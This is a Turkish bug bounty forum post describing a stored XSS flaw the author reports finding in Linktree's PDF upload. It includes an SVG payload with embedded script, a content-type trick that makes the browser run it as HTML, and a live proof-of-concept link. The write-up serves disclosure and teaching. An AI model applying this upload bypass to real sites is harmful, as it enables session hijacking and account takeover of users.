70 milyon kullanıcı olan sitede bulduğum STORED XSS

Merhaba Bughanê Üyeleri!
Bugün Linktree platformunda tespit ettiğim ve başarıyla raporladığım Stored XSS zafiyetini detaylı teknik analiz ile paylaşıyorum.
KEYİFLİ OKUMALAR İZLEMELER.

ZAFİYET DETAYLARI​

• Hedef: https://linktr.ee
• Parametre: Dosya yükleme (PDF upload)
• Endpoint: PDF dosya yükleme fonksiyonu
• Tip: Stored Cross-Site Scripting (XSS)
• Etkisi: Session Hijacking / Account Takeover / Phishing
• PAYLOAD:
• XML:

  <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 200 200">
      <!-- Visual SVG -->
      <rect width="200" height="200" fill="#7418D6" />
  
      <!-- Text in the center -->
      <text x="50%" y="50%" font-size="20" text-anchor="middle" dy=".3em" fill="white">STORED XSS 1atakan1</text>
  
      <!-- XSS Payload: Execute alert on load -->
      <script type="text/javascript">
      alert("STORED XSS 1atakan1");
      </script>
  </svg>

Çalışma Mantığı:
Platformda bulunan dosya yükleme fonksiyonu, yüklenen dosya içeriklerini yeterli şekilde filtrelememektedir. Bu durum, içerisine JavaScript gömülmüş SVG dosyalarının sisteme yüklenmesine olanak tanımaktadır.
Yüklenen dosya .pdf uzantılı gibi görünse de, içerik tipi (Type) text/html olarak değiştirildiğinde tarayıcı tarafından HTML olarak yorumlanmakta ve JavaScript kodu çalıştırılmaktadır.
Kullanıcılar bu dosyayı açtığında payload tetiklenir ve JavaScript kodu çalıştırılır.

Proof of Concept (PoC):​

Aşağıdaki bağlantı üzerinden payload tetiklenebilir:

https://ugc.production.linktr.ee/a12742ce-d36f-4565-b686-c9336108c0be_ALERT-POC.svg.html

Ekli dosyayı görüntüle Video Project 6.mp4